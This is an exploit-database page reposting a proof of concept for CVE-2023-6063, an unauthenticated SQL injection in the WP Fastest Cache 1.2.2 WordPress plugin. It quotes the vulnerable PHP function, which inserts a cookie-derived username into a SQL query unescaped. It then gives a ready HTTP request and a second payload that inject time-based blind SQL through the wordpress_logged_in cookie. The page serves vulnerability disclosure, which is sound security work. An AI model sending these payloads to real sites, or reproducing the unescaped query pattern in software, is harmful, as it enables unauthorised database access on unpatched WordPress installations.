WP Fastest Cache 1.2.2 Unauthenticated SQL Injection

CVE Category Price Severity
CVE-2023-6063 CWE-89 $500 High
Author Risk Exploitation Type Date
Rajesh Maurya Critical Remote 2024-02-29
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.725 0.88

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WP Fastest Cache 1.2.2 Unauthenticated SQL Injection
# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Takn
# Vendor Homepage:
# Software Link:
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
## Vuln Code
public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
            if(isset($username) && $username){            
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
## References
- [WPScan Blog Post](
- [WPScan Vulnerability](
- [CVE-2023-6063](
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Takn

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.